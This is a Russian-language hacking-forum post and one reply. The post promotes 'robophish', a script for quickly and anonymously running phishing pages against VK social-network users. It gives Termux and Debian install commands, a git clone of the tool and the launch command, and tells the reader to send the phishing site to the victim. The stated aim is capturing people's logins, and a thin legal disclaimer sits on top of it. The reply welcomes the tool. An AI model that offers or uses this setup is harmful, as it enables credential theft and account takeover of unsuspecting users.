Скрипт для быстрого и анонимного запуска фишинга для android & linux

geniuz228

Новичок
Статус
offline
Регистрация
05.03.2018
Сообщения
2
Репутация
2
Привет, это моя первая статья тут, да и думаю последняя.

Использование robophish для атаки целей без предварительного обоюдного согласия является незаконным. Конечный пользователь обязан соблюдать все применимые местные, государственные и федеральные законы. Разработчик не несет ответственности за любое неправильное использование или ущерб, причиненный этой программой.

Предыстория: Где-то год назад у меня возникла потребность в хорошем фишинге для вк. Спустя некоторое время поиска, я все же нашел несколько достойных, но вспомнил о том, что я немного забыл об анонимности. Ведь фишинг надо ставить на хост, а это небольшой удар по конфиденциальности. И тогда-то я задумался, как же пользоваться фишингом, не тратить на хороший хост деньги и оставаться анонимным?

В итоге я нашел утилиту shellphish github.com/thelinuxchoice(не реклама)
но ее функционал был нацелен на не очень умных пользователей, которые до сих пор ведутся на обычный сайт с авторизацией. И тогда мне в голову пришла идея написать свою утилиту. Сборник с самыми лучшими фишингами вк. Не буду скрывать, за основу я взял его скрипт, а сайты нашел в открытом доступе. Но первая версия получилась довольно сырая и не работала должным образом.Но спустя почти год, я решил доделать начатое и выпустил вторую версию.
Скачать можно тут(не реклама)

Для простоты работы требуется Linux. Установка будет для Debian Linux. В других дистрибутивах, команды могут немного отличаться, однако если вы умеете гуглить вы справитесь со всеми ошибками. Установка на Windows - не тестировалась.

УСТАНОВКА АНДРОИД:
pkg update
pkg upgrade
apt install curl git php openssh -y
git clone https://github.com/gasayminajj/robophish

УСТАНОВКА LINUX:
apt update & apt upgrade
apt install curl git php openssh -y
git clone https://github.com/gasayminajj/robophish


Если у вас Android, то нужно включить сотовые данные(выкл wifi) и включить режим модема.

bash robophish.sh

Скидываем сайт жертве.

Если у вас на этапе запуска нет ошибок, то дальше сами разберетесь. Если они есть, то это ошибки связанные с отсутствием php.
Надеюсь вы сами сами разберетесь с установкой php, если будут вопросы, дополню статью сведениями об установке. Возможно позже сделаю гайд по установке на Windows(там и самому можно разобраться, используйте Cygwin64(не реклама) )

А еще хочется узнать, не зря ли я все это сделал? Просто мне кажется, гораздо безопаснее использовать ngrok, вся информации о сайте на котором он был поднят, исчезает по нажатию ctrl+c. Если это не так, то поправьте пожайлуста)
 

Lis163

Новичок
Статус
offline
Регистрация
19.02.2019
Сообщения
8
Репутация
3
ngrok порядком подzаебал уже,ну а тут свежак,так сказать)